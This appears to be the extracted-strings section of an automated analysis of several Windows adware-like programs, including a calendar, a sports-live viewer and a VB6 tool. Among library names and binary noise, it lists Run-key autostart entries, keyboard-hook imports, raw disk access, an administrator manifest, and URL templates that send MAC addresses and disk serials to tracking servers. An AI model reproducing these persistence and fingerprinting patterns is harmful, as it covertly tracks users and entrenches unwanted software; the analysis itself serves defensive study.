(%s:%d)</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>Acomctl32.dll</pre><pre>Acomdlg32.dll</pre><pre>Ashell32.dll</pre><pre>http://</pre><pre>@WININET.DLL</pre><pre>mfcm90u.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl</pre><pre>user32.dll</pre><pre>accKeyboardShortcut</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>xbasicSetting.xml</pre><pre>subdivis.db</pre><pre>timedate.cpl</pre><pre>http://www.fhrlw.com</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>S_11.png</pre><pre>S_22.png</pre><pre>clocknote_list_item.xml</pre><pre>{b}%s{/b}</pre><pre>%d-d-d d:d</pre><pre>pg1_operation_small</pre><pre>pg1_operation_big</pre><pre>{c #808080}%d-d-d d:d{/c}</pre><pre>index.png</pre><pre>index_1.png</pre><pre>clock_note_setting.xml</pre><pre>xfhnotetip.xml</pre><pre>menu.xml</pre><pre>Update.exe</pre><pre>Updatb.exe</pre><pre>Update_bak.exe</pre><pre>FMTest.exe</pre><pre>\FMDLL32.dll</pre><pre>FMDLL32.dll</pre><pre>GetMsgProc</pre><pre>xfh.xml</pre><pre>http://client.fhrlw.com/ad/shopping.html?id=%d</pre><pre>Skin\warn.wav</pre><pre>pg2_web</pre><pre>data.db</pre><pre>info.db</pre><pre>note.ini</pre><pre>%d-d-d</pre><pre>%d/d/d</pre><pre>%c%d%d%d</pre><pre>http://client.fhrlw.com/ad/fixad.html?id=%d</pre><pre>%s(%d/d/d)</pre><pre>clock_del_nor.png</pre><pre>clock_del_hov.png</pre><pre>clock_del_push.png</pre><pre>finish_nor.png</pre><pre>finish_hov.png</pre><pre>finish_push.png</pre><pre>%d-%d-%d</pre><pre>%c%d%d</pre><pre>jintian3.png</pre><pre>huangli.xml</pre><pre>%d-01-01</pre><pre>%s{n}</pre><pre>{c #ff0000}%d{/c}</pre><pre>{n}{c #ff0000}%s{/c}</pre><pre>http://client.fhrlw.com/Api/GetHoliday.ashx</pre><pre>http://client.fhrlw.com/Api/GetWeather.ashx?province=%s&city=%s</pre><pre>ohttp://client.fhrlw.com/Api/SendClickData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&date=%s&clickcount1=%d&clickcount2=%d&clickcount3=%d&clickcount4=%d</pre><pre>http://client.fhrlw.com/Api/Sendndays2openData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&ndays=%d</pre><pre>http://client.fhrlw.com/Api/getRightDownState.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/Api/onlineLength.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/api/GetConfig.ashx</pre><pre>xhlwnd.xml</pre><pre>EKey</pre><pre>dd</pre><pre>%s<n>%s</n></pre><pre><f 2="2">%s</f><n><f 2="2">%s</f></n></pre><pre>%Y-%m-%d %H:%M:%S</pre><pre>MiniWebWnd</pre><pre>xminiweb.xml</pre><pre>web_info</pre><pre>http://client.fhrlw.com/mini.html?id=%d</pre><pre>EPopWebWnd</pre><pre>xpopweb.xml</pre><pre>http://client.fhrlw.com/ad/popad.html?id=%d</pre><pre>\\.\PhysicalDrive%d</pre><pre>\\.\Scsi%d:</pre><pre>%%%2x</pre><pre>%Program Files%\fhrl\FhCalendar.exe</pre><pre>All Files (*.*)</pre><pre>No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.</pre><pre>Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.</pre><pre>Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.</pre><pre>#Unable to load mail system support.</pre><pre>1.0.0.1</pre><pre>FhCalendar.exe</pre><b>MSIB.tmp_916:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>KERNEL32.dll</pre><pre>ShellExecuteW</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre>11.0.0.0</pre><pre>viewer.exe</pre><b>SportLive.exe_908:</b><pre>.text</pre><pre>.rdata</pre><pre>.data</pre><pre>.rsrc</pre><pre>.reloc</pre><pre>.aspack</pre><pre>.adata</pre><pre>Pht%D</pre><pre>CCmdTarget</pre><pre>CNotSupportedException</pre><pre>hhctrl.ocx</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>comctl32.dll</pre><pre>comdlg32.dll</pre><pre>shell32.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>mfcm90.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>user32.dll</pre><pre>ole32.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>OLEACC.dll</pre><pre>\Liveconfig.ini</pre><pre>%A,%B,%d,%Y</pre><pre>D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl</pre><pre>%s (%s:%d)</pre><pre>images\tab_bg.png</pre><pre>images\tabclose1.png</pre><pre>images\tabclose2.png</pre><pre>images\tabclose3.png</pre><pre>images\tab_item1.png</pre><pre>images\tab_item2.png</pre><pre>images\tab_item3.png</pre><pre>http://sport.yuejan.com/online/html/events/ad.html</pre><pre>http://sport.yuejan.com/online/html/events/event.html</pre><pre>sports.cntv.cn</pre><pre>tv.cntv.cn</pre><pre>apps.sports.cntv.cn</pre><pre>live.video.sina.com.cn/room/</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>KeyName=%s</pre><pre>\\.\PhysicalDrive%d</pre><pre>X-X-X-X-X-X</pre><pre>%Program Files%\xxss.ini</pre><pre>http://dif.9yfc.com/cloudy/iau.xhtml?op=active&st=1&ma=</pre><pre>CWebPage</pre><pre>F:\project\SprotLive\Release\</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>CreateDialogIndirectParamA</pre><pre>GetKeyState</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>USER32.dll</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>WINSPOOL.DRV</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyA</pre><pre>ADVAPI32.dll</pre><pre>SHELL32.dll</pre><pre>COMCTL32.dll</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>OLEAUT32.dll</pre><pre>gdiplus.dll</pre><pre>IPHLPAPI.DLL</pre><pre>GetProcessHeap</pre><pre>.?AVCCmdUI@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCOleException@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCFileException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCException@@</pre><pre>.?AVCWebPage@@</pre><pre>%Program Files%\xxdd\SportLive.exe</pre><pre>%Program Files%\xxdd\Liveconfig.ini</pre><pre>jJs%C*</pre><pre>9D<.KA</pre><pre>Tev%CP</pre><pre>K p<<c.sL</pre><pre>%F-yg</pre><pre>^L)%X,</pre><pre>.fQEC)</pre><pre>k.KKS</pre><pre>`t":.rZ"</pre><pre>.UH8&</pre><pre>h%F& t</pre><pre>*.Aqr</pre><pre>%F-<K><pre>%D-<K><pre>.XXPmUx</pre><pre>8.Da`</pre><pre>5.lbK</pre><pre>K5.Ac</pre><pre>!,.WD</pre><pre>x.Dzu</pre><pre>.ZO $r</pre><pre>jsF%f</pre><pre>B.bc'</pre><pre>lX%S:Gm</pre><pre>Sò/</pre><pre>R<#D.Lps</pre><pre>ò4 </pre><pre>.hfpv/m</pre><pre>.gAP]y</pre><pre>%CR-<</pre><pre>2R.bz</pre><pre>mQh%x</pre><pre>.LTb`</pre><pre>esQLo</pre><pre>aQt.bp</pre><pre>|5%s'</pre><pre>;.FE~</pre><pre>Ji%fG</pre><pre>.MyS!</pre><pre>%dL<K><pre>c.UnG</pre><pre>N9.HG*f</pre><pre>&s%U2N</pre><pre>a#^L%C^,$k</pre><pre>oA.tc2&</pre><pre>c.GWC/B</pre><pre>.Tl2P</pre><pre>22=.pA</pre><pre>')KEY$</pre><pre>Sj Þ^J</pre><pre>q%XMs</pre><pre>H.fb:</pre><pre>S%S6E</pre><pre>v:yu%f</pre><pre>.UrZk</pre><pre>xQi@%X</pre><pre>.DlDR</pre><pre>Z6.af}7E</pre><pre>i]}sGtCp</pre><pre>%C'E}</pre><pre>n".HbU</pre><pre>N9Y%D</pre><pre>EOO .lj</pre><pre>1.ndY</pre><pre>.trQQ</pre><pre>2\AýD</pre><pre>-%%u(</pre><pre>rM.en</pre><pre>,V.DfB</pre><pre>",Í</pre><pre>g.Ov[*g</pre><pre>P%UX:u</pre><pre>s.tqe</pre><pre>eR.iQ</pre><pre>Mq.FlO4</pre><pre>.fL$V</pre><pre>J.Tj@</pre><pre>.dT}<</pre><pre>1Et ß</pre><pre>%s%:k</pre><pre>mP.pO</pre><pre>LT&4X.LQ<</pre><pre>.ewFy</pre><pre>w.VUO</pre><pre>!l<L><pre>x`%C$</pre><pre>wV5_U%u</pre><pre>r7.kJ</pre><pre>5.zOE=</pre><pre>.K.Uq</pre><pre>Y.fl|</pre><pre>Af.hd=</pre><pre>p%XD@</pre><pre>.nfqi</pre><pre>/k.qa</pre><pre>S%d#/</pre><pre> 'Q%s</pre><pre>Pw.QC</pre><pre>[ya3K%u</pre><pre>^L%9X-,</pre><pre>%Do,}</pre><pre>v/%x s</pre><pre>%&%.xN</pre><pre>9!%u _)</pre><pre>%sOeK#</pre><pre>L.hDX</pre><pre>(%.Lj</pre><pre>%d,$k</pre><pre>SQ%S"{3</pre><pre>-.Qg=</pre><pre>@.iT'P</pre><pre>x .Xs</pre><pre>}U-j} </pre><pre>2&2tF%FS</pre><pre>MCRT</pre><pre>^J}%f,<</pre><pre>gA[a%x@</pre><pre>.bwrxR</pre><pre>1V.Tz</pre><pre>YK%UL</pre><pre>)h.OY</pre><pre>.vJcw</pre><pre>o.BJ2</pre><pre>E;.SMS</pre><pre>%C\,<</pre><pre>@I*ËBM</pre><pre>R..xu</pre><pre>ÞlE></pre><pre>%fl k</pre><pre>m.Vbu</pre><pre>,(%u0</pre><pre>.Tk>X</pre><pre>.doBn</pre><pre>Bv%%f</pre><pre>%f,,k</pre><pre>*.Qg9bif</pre><pre>.TT=U</pre><pre>tB.pl</pre><pre>D=.ST</pre><pre>È '[</pre><pre>dy%XY</pre><pre>.TKyq</pre><pre>AE.wL</pre><pre>f0'.Pe</pre><pre>%UtD%</pre><pre>LG7%u</pre><pre>%1U8*></pre><pre>JG$.Ir</pre><pre>^KI%dL<k><pre>_.zY^</pre><pre>#e#b.ig</pre><pre>.DQ:DI</pre><pre>@xdH</pre><pre>C7%c:#</pre><pre>^K%CV,</pre><pre>~.GlkXAV</pre><pre>lSqL</pre><pre>GM.fG^`</pre><pre>C3.tH</pre><pre>N#KEy</pre><pre>sL%SY:3'</pre><pre>u:\^q</pre><pre>~.Lz/;"%</pre><pre>U%d.PVS</pre><pre>8.axb</pre><pre>1[s%D</pre><pre>`#?eXe</pre><pre>cúo</pre><pre>%XH\XzT"</pre><pre>.pQF(</pre><pre>LI%X-@</pre><pre>d.KM/</pre><pre>.gdGT1</pre><pre>Qx.KP</pre><pre>%f,}vh</pre><pre>uuBTcpaB</pre><pre>\R%DhG</pre><pre>jSLJJik.BCV</pre><pre>luRl</pre><pre>V(]E.ie</pre><pre>7!.va</pre><pre>X|I.Xiky</pre><pre>)Y.iu</pre><pre>LMSg</pre><pre>Eq0%X</pre><pre>$scm%X</pre><pre>%F Q21Sm</pre><pre>30}L2</pre><pre>K-a}BD;</pre><pre>zH.lG</pre><pre>!H8UX%s</pre><pre>4]j%7Uu</pre><pre>Wj.bL</pre><pre>.xzev</pre><pre>Xiy%x</pre><pre>%dL$k</pre><pre>O$Ç</pre><pre>v> .bt</pre><pre>wdGwG%s</pre><pre>%8x."@</pre><pre>.aK>5</pre><pre>^JÏL</pre><pre>:Vk.Tl</pre><pre>a.EDY</pre><pre>.gQ&c</pre><pre>Kg.MFQZ</pre><pre>r.aK;</pre><pre>4.qrq</pre><pre>7333332</pre><pre>OU)>M</pre><pre>.uUUs</pre><pre>.UVVg</pre><pre>aKi.Xa</pre><pre>Q )Odc.eff</pre><pre>ee%.s)</pre><pre>f.mAYU</pre><pre>d.UVK</pre><pre>c%cRU[</pre><pre>%x< *</pre><pre>h:\J[</pre><pre>)%fl$K</pre><pre>Ay.KV</pre><pre>%Xa(_</pre><pre>b/(%XD</pre><pre>1.Tb2</pre><pre>.Ds3E<</pre><pre>.jL`Oz_</pre><pre>E.EGF</pre><pre>^KuMsG</pre><pre>.MF;e</pre><pre>%dL4k</pre><pre>m%fL4K</pre><pre>%9S.<</pre><pre>9 .ud</pre><pre>#.bIA</pre><pre>QJ%4s</pre><pre>0~.Au</pre><pre>W/%Ut</pre><pre>!=%DG</pre><pre>)(@:::5%</pre><pre>CRP%x</pre><pre>{IjP.tk%</pre><pre>%Ck\3R</pre><pre>%fl4K</pre><pre>H6).nO</pre><pre>.VD8VEmg K</pre><pre>Q=f\LA%f</pre><pre>iXZ.td EJ</pre><pre>Ppr-5P}</pre><pre>#Ha%CQf</pre><pre>I-f}3</pre><pre>f#|</pre><pre>QV.bp</pre><pre>%URiz</pre><pre>.EEr8</pre><pre>q.iQf</pre><pre>C.SJw </pre><pre>.qsn8q</pre><pre>.BS=uV</pre><pre>.dL9)</pre><pre>I%dl4</pre><pre>9%fU/</pre><pre>_J@%D</pre><pre>".DZ(</pre><pre>ZH.GP</pre><pre>Nzl%uu</pre><pre>.qHF^</pre><pre>|I.qh</pre><pre>,b50z3.Bq</pre><pre>.CWU!</pre><pre>.DfTb]</pre><pre>.it-&D? </pre><pre>q&.id</pre><pre>Mj.gv</pre><pre>^k.uH$</pre><pre>\Ku%d</pre><pre>%x-@D</pre><pre>?5.MS</pre><pre>.hU&W</pre><pre>/.xVy</pre><pre>Ë d</pre><pre>.qQGFG</pre><pre>b'Ä</pre><pre>.UHf5 1</pre><pre>Wk"@.Xg</pre><pre>{>.sN<n%><pre>(.Bpr</pre><pre>%dL@k</pre><pre>.Ptj?</pre><pre>G%xu)F</pre><pre>url\{X</pre><pre>`2.TEHR</pre><pre>?Bx%F</pre><pre>%u$qP</pre><pre>4U5.Wm</pre><pre>1M.dWa</pre><pre>wA.IL</pre><pre>;P"F%C</pre><pre>.Ul56</pre><pre>f.ZqB</pre><pre>.du)@</pre><pre>Vm.dv:Q</pre><pre>nf.MI</pre><pre>oOuk)s{%U[</pre><pre>.rXW(</pre><pre>:%2x\D</pre><pre>z%djt</pre><pre>)).RwS</pre><pre>-z}s-]</pre><pre>%xQ#Y</pre><pre>(t %fN</pre><pre>%c-V,</pre><pre>#%CX\</pre><pre>q"Y.uPbXk</pre><pre>}.YRr</pre><pre>J(B/.Tv</pre><pre>5%dur</pre><pre>.bsf`?</pre><pre>)%d,<</pre><pre>Rb.ht</pre><pre>Q.AV#</pre><pre>"zO%f</pre><pre>A"p</pre><pre>.osWF</pre><pre>?.yy@</pre><pre>W%cpA</pre><pre>c.Yvhr</pre><pre>.bfAAN?</pre><pre>^Jq%d</pre><pre>\:%x"</pre><pre>Vj/n%fg</pre><pre>&]D'%fp</pre><pre>;'k%d~</pre><pre>iho.TH</pre><pre>|d.EH</pre><pre>w.gNY</pre><pre>.bl0Z</pre><pre>RP%D`</pre><pre>.VyKe</pre><pre>C.bbL$</pre><pre>qF%D$</pre><pre>R7X`%c</pre><pre>h=.QT</pre><pre>V(j{%S</pre><pre>&@M</pre><pre>eWEb</pre><pre>a.Lt></pre><pre>:4.MIcX</pre><pre>y.lT\n</pre><pre>%E.oI</pre><pre>D1%Dr</pre><pre>;Mn%F</pre><pre>}F%5S\</pre><pre>-Bi}M9</pre><pre>P].yv</pre><pre>~.rl^</pre><pre>VLn;P.au</pre><pre>.IoK(</pre><pre>7uu</pre><pre>Q:\2y</pre><pre>@.cSx8H\</pre><pre>6qN%U</pre><pre>46.wjJ</pre><pre>iTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:1405FFA5061411E3A66E8352AA12703D" xmpMM:DocumentID="xmp.did:1405FFA6061411E3A66E8352AA12703D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1405FFA3061411E3A66E8352AA12703D" stRef:documentID="xmp.did:1405FFA4061411E3A66E8352AA12703D" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>.Twyy</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:CDA243D50BBA11E3BD1B8399A9672FB8" xmpMM:DocumentID="xmp.did:CDA243D60BBA11E3BD1B8399A9672FB8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CDA243D30BBA11E3BD1B8399A9672FB8" stRef:documentID="xmp.did:CDA243D40BBA11E3BD1B8399A9672FB8" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Thz5</pre><pre>diTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" xmpMM:DocumentID="xmp.did:EB6F6CFF0BBC11E3AE59D4B86C485946" xmpMM:InstanceID="xmp.iid:EB6F6CFE0BBC11E3AE59D4B86C485946" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6813E5CB910BE31191A789C5D0E269E2" stRef:documentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:F61CD52B0BBA11E39778AEF7B3A21195" xmpMM:DocumentID="xmp.did:F61CD52C0BBA11E39778AEF7B3A21195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F61CD5290BBA11E39778AEF7B3A21195" stRef:documentID="xmp.did:F61CD52A0BBA11E39778AEF7B3A21195" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:690E21BC1E8111E3890F9E8C651F0308" xmpMM:DocumentID="xmp.did:690E21BD1E8111E3890F9E8C651F0308"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:690E21BA1E8111E3890F9E8C651F0308" stRef:documentID="xmp.did:690E21BB1E8111E3890F9E8C651F0308" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:ED16D5261EA511E3B21FD5142BC3ECF6" xmpMM:DocumentID="xmp.did:ED16D5271EA511E3B21FD5142BC3ECF6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ED16D5241EA511E3B21FD5142BC3ECF6" stRef:documentID="xmp.did:ED16D5251EA511E3B21FD5142BC3ECF6" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>8</pre><pre>.hH'"</pre><pre>'.dDji</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:998416A1B573E311B2FCE348ED0BFFDD" xmpMM:DocumentID="xmp.did:F2EFE278939111E3825F920E2590D74E" xmpMM:InstanceID="xmp.iid:F2EFE277939111E3825F920E2590D74E" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D52A66E69193E3118647F353FF5C7A7F" stRef:documentID="xmp.did:978416A1B573E311B2FCE348ED0BFFDD" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>3^</pre><pre>/%$]]](((</pre><pre>>-i7%DRG$</pre><pre>F1kL%U</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>gdi32.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shlwapi.dll</pre><pre>oleaut32.dll</pre><pre>iphlpapi.dll</pre><pre><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></pre><pre>accKeyboardShortcut</pre><pre>ekernel32.dll</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>6.0.1</pre><pre>{8856F961-340A-11D0-A96B-00C04FD705A2}</pre><pre>(*.*)</pre><pre>1.0.1</pre><pre>SprotLive.exe</pre><b>Wuji.exe_568:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>MSVBVM60.DLL</pre><pre>.Play78QQForm</pre><pre>.Play78QQButton</pre><pre>SHDocVwCtl.WebBrowser</pre><pre>#vb6chs.dll</pre><pre>shdocvw.dll</pre><pre>WebBrowser</pre><pre>D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB</pre><pre>H:\WINDOWS\system32\shdocvw.oca</pre><pre>GetAsyncKeyState</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>DeleteUrlCacheEntryA</pre><pre>user32.dll</pre><pre>Wuji.ime</pre><pre>advapi32.dll</pre><pre>RegCreateKeyA</pre><pre>RegCloseKey</pre><pre>GetProcessHeap</pre><pre>kernel32.dll</pre><pre>H:\WINDOWS\system32\MSVBVM60.DLL\3</pre><pre>COMDLG32.DLL</pre><pre>FH:\WINDOWS\system32\stdole2.tlb</pre><pre>VBA6.DLL</pre><pre>Keys</pre><pre>.kJC_a\</pre><pre>I|.....4444445555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555.zI</pre><pre>Ey ....11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.......yE</pre><pre>All (*.*)| *.*</pre><pre>New_Key</pre><pre>http:///</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>http://www.miaoxia123.com</pre><pre>\Wuji.dat</pre><pre>Wuji.dat</pre><pre>\Show.dat</pre><pre>Show.dat</pre><pre>http://www.mi</pre><pre>a123.net/</pre><pre>gmts:\\.\ro</pre><pre>st.ex</pre><pre>install.php?login=</pre><pre>Email:ggxzabcc@163.com http://www.miaoxia123.com</pre><pre>*.TXT</pre><pre>|*.txt</pre><pre>onlinefirst.php?user=</pre><pre>\update.exe</pre><pre>WindowState</pre><pre>.commonDialog</pre><pre>.VBError</pre><pre>Windows 95 OSR2</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 2000 Data center</pre><pre>Windows 2000 Advanced</pre><pre>Windows 2000</pre><pre>Windows Vista</pre><pre>Windows XP Professional</pre><pre>Windows XP Home</pre><pre>Windows XP</pre><pre>Windows Server 2003 Enterprise</pre><pre>Windows Server 2003 Data center</pre><pre>Windows Server 2003 Web Edition</pre><pre>Windows Server 2003 Standard</pre><pre>Windows Server 2003</pre><pre>Web Server Edition</pre><pre>Windows Vista Server 2008</pre><pre>Windows 7</pre><pre>6.2.9200</pre><pre>Windows 8</pre><pre>Windows 8.1</pre><pre>5.0.2195</pre><pre>Windows 2000</pre><pre>Windows</pre><pre>5.2.3790</pre><pre>Windows 